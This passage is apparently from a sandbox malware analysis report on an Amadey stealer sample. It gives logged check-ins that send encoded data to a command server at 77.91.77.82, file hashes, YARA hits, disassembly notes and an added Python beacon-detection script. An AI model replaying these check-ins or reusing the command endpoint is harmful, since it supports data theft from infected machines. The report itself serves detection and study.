                  Jul 26, 2024 21:09:17.122951984 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  17          192.168.2.4  49754        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:09:38.586484909 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  18          192.168.2.4  49755        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:10:00.067935944 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  19          192.168.2.4  49756        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:10:16.850768089 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  20          192.168.2.4  49757        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:10:21.380522013 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  21          192.168.2.4  49758        77.91.77.82     80                2172  C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:10:22.475981951 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                  22          192.168.2.4  49759        77.91.77.82     80
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:10:26.600574017 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                  23          192.168.2.4  49760        77.91.77.82     80
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:10:47.965507030 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                  24          192.168.2.4  49761        77.91.77.82     80
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:10:55.899800062 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                  25          192.168.2.4  49762        77.91.77.82     80
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:11:17.295763016 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                  26          192.168.2.4  49763        77.91.77.82     80
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:11:38.823549032 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                  27          192.168.2.4  49764        77.91.77.82     80
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:11:54.978001118 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                  28          192.168.2.4  49765        77.91.77.82     80
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:11:59.100178957 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                  29          192.168.2.4  49766        77.91.77.82     80
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:12:03.115536928 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                  30          192.168.2.4  49767        77.91.77.82     80
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:12:03.692563057 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                  31          192.168.2.4  49768        77.91.77.82     80
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:12:06.145739079 CEST  303                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                  32          192.168.2.4  49769        77.91.77.82     80
                  Timestamp                             Bytes transferred  Direction  Data
                  Jul 26, 2024 21:12:06.270699024 CEST  151                OUT        POST /Hun4Ko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.82
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s

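                  The sessions above all follow one shape: explorti.exe POSTs to /Hun4Ko/index.php on 77.91.77.82 with a form body that is either the 4-byte "st=s" or a 154-byte "r=<hex>", and the early sessions are spaced about four seconds apart. Below is an added Python example (analyst tooling written for this page, not Joe Sandbox code and not part of the Amadey sample) that parses the sandbox's fused "<timestamp> CEST<bytes><direction><request line>" rendering, labels the two body shapes, and decides whether the sequence looks like a beacon. The timestamps, sizes, host, path and bodies are copied from sessions 0 to 5 above; the one-record-per-line layout with '|' separators, the label names "status-ping" and "encoded-report", and the jitter and minimum-request thresholds are assumptions of this example. The "r=" payload is left undecoded because the report gives no key for it; the example only measures it.

```python
"""Parse the Amadey-style HTTP check-ins listed in the report and flag the beacon.

Added example for this report page: not Joe Sandbox code and not code from the
sample. Request data is copied from the sessions above; the record layout,
labels and thresholds are this example's own assumptions.
"""
import re
import statistics
from datetime import datetime

# The hex body carried by every 303-byte request in the report (copied from it).
REPORT_HEX = (
    "B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B1"
    "40BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F46"
    "2AE478222FFDED0F8E1F939F"
)

# Constructed sample: sessions 0-5 of the report, one record per line in the
# assumed layout "<timestamp> CEST<bytes><direction><request line>|<host>|<body>".
SAMPLE_LOG = "\n".join([
    "Jul 26, 2024 21:08:11.492743015 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1|77.91.77.82|st=s",
    f"Jul 26, 2024 21:08:15.536706924 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1|77.91.77.82|r={REPORT_HEX}",
    "Jul 26, 2024 21:08:19.658808947 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1|77.91.77.82|st=s",
    f"Jul 26, 2024 21:08:23.678807020 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1|77.91.77.82|r={REPORT_HEX}",
    "Jul 26, 2024 21:08:27.802443027 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1|77.91.77.82|st=s",
    f"Jul 26, 2024 21:08:31.817023039 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1|77.91.77.82|r={REPORT_HEX}",
])

# The sandbox prints timestamp, byte count, direction and request line with no
# separator; the fixed vocabulary (IN/OUT followed by the HTTP method) splits it.
RECORD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{9}) CEST"
    r"(?P<size>\d+)(?P<direction>IN|OUT)"
    r"(?P<method>GET|POST|HEAD|PUT) (?P<path>\S+) HTTP/1\.[01]"
    r"\|(?P<host>[^|]+)\|(?P<body>.*)$"
)


def parse_record(line):
    m = RECORD_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised record: {line!r}")
    rec = m.groupdict()
    # strptime's %f accepts at most six fractional digits; the capture has nine.
    rec["ts"] = datetime.strptime(rec["ts"][:-3], "%b %d, %Y %H:%M:%S.%f")
    rec["size"] = int(rec["size"])
    return rec


def parse_log(text):
    return [parse_record(line) for line in text.splitlines() if line.strip()]


def classify_body(body):
    """Label the two body shapes seen in the report: 'st=s' and 'r=<hex>'."""
    if body == "st=s":
        return "status-ping"
    m = re.fullmatch(r"r=([0-9A-Fa-f]+)", body)
    if m and len(m.group(1)) % 2 == 0:
        return "encoded-report"
    return "other"


def summarise(records, max_jitter=0.5, min_requests=4):
    """Summarise requests to one endpoint and decide whether they look like a beacon.

    Beacon here means: at least min_requests POSTs to the same host and path,
    every body in one of the two known shapes, and each gap between consecutive
    requests within max_jitter seconds of the median gap (assumed thresholds).
    """
    endpoints = {(r["host"], r["path"]) for r in records}
    if len(endpoints) != 1:
        raise ValueError("summarise() expects requests to a single endpoint")
    host, path = endpoints.pop()
    classes = [classify_body(r["body"]) for r in records]
    reports = {r["body"] for r, c in zip(records, classes) if c == "encoded-report"}
    report_bytes = {len(bytes.fromhex(b[2:])) for b in reports}
    gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(records, records[1:])]
    median = statistics.median(gaps) if gaps else 0.0
    regular = bool(gaps) and all(abs(g - median) <= max_jitter for g in gaps)
    all_post = all(r["method"] == "POST" for r in records)
    return {
        "host": host,
        "path": path,
        "requests": len(records),
        "all_post": all_post,
        "classes": {c: classes.count(c) for c in set(classes)},
        "identical_reports": len(reports) == 1,
        "report_bytes": report_bytes.pop() if len(report_bytes) == 1 else None,
        "median_interval": round(median, 3),
        "beacon": (len(records) >= min_requests and regular and all_post
                   and "other" not in classes),
    }


if __name__ == "__main__":
    print(summarise(parse_log(SAMPLE_LOG)))
```

Run on the six records, the summary reports all-POST traffic to one endpoint, three status pings alternating with three encoded reports, a median gap of about 4.04 s with well under half a second of jitter, and a report body that decodes to 76 bytes and is byte-identical in every session, which is what the full listing above shows for all sixteen "r=" requests. Note that the gaps grow to around twenty seconds from session 17 onwards, so a production detector should key on the body shapes and endpoint rather than on a fixed interval.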

                  Target ID:0
                  Start time:15:08:00
                  Start date:26/07/2024
                  Path:C:\Users\user\Desktop\Jl5yg1Km2s.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Jl5yg1Km2s.exe"
                  Imagebase:0xa00000
                  File size:1'924'608 bytes
                  MD5 hash:1C198A27C76F075B7901945F67ED0115
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1721841303.0000000005210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1762264441.0000000000A01000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:1
                  Start time:15:08:06
                  Start date:26/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                  Imagebase:0x7ff7699e0000
                  File size:1'924'608 bytes
                  MD5 hash:1C198A27C76F075B7901945F67ED0115
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.1777304943.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 79%, ReversingLabs
                  Reputation:low
                  Has exited:false

                  Target ID:6
                  Start time:15:09:00
                  Start date:26/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Imagebase:0x3e0000
                  File size:1'924'608 bytes
                  MD5 hash:1C198A27C76F075B7901945F67ED0115
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000003.2310206865.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000002.2350558815.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false


                    Execution Graph

                    Execution Coverage:6.5%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:7.1%
                    Total number of Nodes:621
                    Total number of Limit Nodes:44
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
                    • String ID: 246122658369$4dd39d$Ip==$NvWsKw==$PzE+$PzI+$YQAZ$YQQZ$YfcZ$ZzSZ$aPIZ$bAQZ$bV5Z$bWEZ$cVIZ$cWI2as==$ccS=$czEZ$dPWZ$dgEZ$stoi argument out of range$eBs
                    • API String ID: 3545240790-3136512537
                    • Opcode ID: f55ddcdc9cfea38b7813826ae3574a916f6d560bbe71b1aebf7d1f61cd037abd
                    • Instruction ID: 2b2eb45ec27ec355595aa1363d3ad5fadc776b019884c7b96fe60b0f8ed393f0
                    • Opcode Fuzzy Hash: f55ddcdc9cfea38b7813826ae3574a916f6d560bbe71b1aebf7d1f61cd037abd
                    • Instruction Fuzzy Hash: 9E230771E1025C8BEB1ADB28CD4A7ADBB769F81304F5482D8E108AB2D2DB755F84CF51

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 760 3ebd30-3ebd7c 761 3ebd82-3ebd86 760->761 762 3ec171-3ec196 call 3f7f00 760->762 761->762 764 3ebd8c-3ebd90 761->764 767 3ec198-3ec1a4 762->767 768 3ec1c4-3ec1dc 762->768 764->762 766 3ebd96-3ebe1f InternetOpenW InternetConnectA call 3f7840 call 3e5b00 764->766 794 3ebe23-3ebe3f HttpOpenRequestA 766->794 795 3ebe21 766->795 770 3ec1ba-3ec1c1 call 3fd569 767->770 771 3ec1a6-3ec1b4 767->771 772 3ec128-3ec140 768->772 773 3ec1e2-3ec1ee 768->773 770->768 771->770 775 3ec23f-3ec244 call 416b7a 771->775 780 3ec146-3ec152 772->780 781 3ec213-3ec22f call 3fcef4 772->781 777 3ec11e-3ec125 call 3fd569 773->777 778 3ec1f4-3ec202 773->778 777->772 778->775 785 3ec204 778->785 787 3ec158-3ec166 780->787 788 3ec209-3ec210 call 3fd569 780->788 785->777 787->775 796 3ec16c 787->796 788->781 798 3ebe70-3ebedf call 3f7840 call 3e5b00 call 3f7840 call 3e5b00 794->798 799 3ebe41-3ebe50 794->799 795->794 796->788 812 3ebee3-3ebef9 HttpSendRequestA 798->812 813 3ebee1 798->813 800 3ebe66-3ebe6d call 3fd569 799->800 801 3ebe52-3ebe60 799->801 800->798 801->800 814 3ebf2a-3ebf52 812->814 815 3ebefb-3ebf0a 812->815 813->812 818 3ebf54-3ebf63 814->818 819 3ebf83-3ebfaa 814->819 816 3ebf0c-3ebf1a 815->816 817 3ebf20-3ebf27 call 3fd569 815->817 816->817 817->814 821 3ebf79-3ebf80 call 3fd569 818->821 822 3ebf65-3ebf73 818->822 828 3ebfb0-3ec060 call 414160 819->828 821->819 822->821
                    APIs
                    • InternetOpenW.WININET(00438D18,00000000,00000000,00000000,00000000), ref: 003EBDBC
                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 003EBDE0
                    • HttpOpenRequestA.WININET(?,00000000), ref: 003EBE2B
                    • HttpSendRequestA.WININET(?,00000000), ref: 003EBEEB
                    • InternetCloseHandle.WININET(?), ref: 003EC077
                    • InternetCloseHandle.WININET(?), ref: 003EC07F
                    • InternetCloseHandle.WININET(?), ref: 003EC087
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectSend
                    • String ID: UfNm$Ux1MTw==$aAJTaDE6OpZ=$aAJTazgvOn==$invalid stoi argument$stoi argument out of range$3D$eBs$eBs$eBs
                    • API String ID: 3319208088-2617655494
                    • Opcode ID: 3f921865a36b1e3fc646c6865729cf59c3e465418ad0817d8d759c699f46b7f7
                    • Instruction ID: 6f6eec2da20ee53f47600f90c0acdfeab66c13cd9c8378b67a9cf03c23764c39
                    • Opcode Fuzzy Hash: 3f921865a36b1e3fc646c6865729cf59c3e465418ad0817d8d759c699f46b7f7
                    • Instruction Fuzzy Hash: B1B116B1A101689BDB26CF29CC85BEEBB79EF45304F504698F608972C1D7749AC1CF94

                    Control-flow Graph

                    • Executed
                    • Not Executed
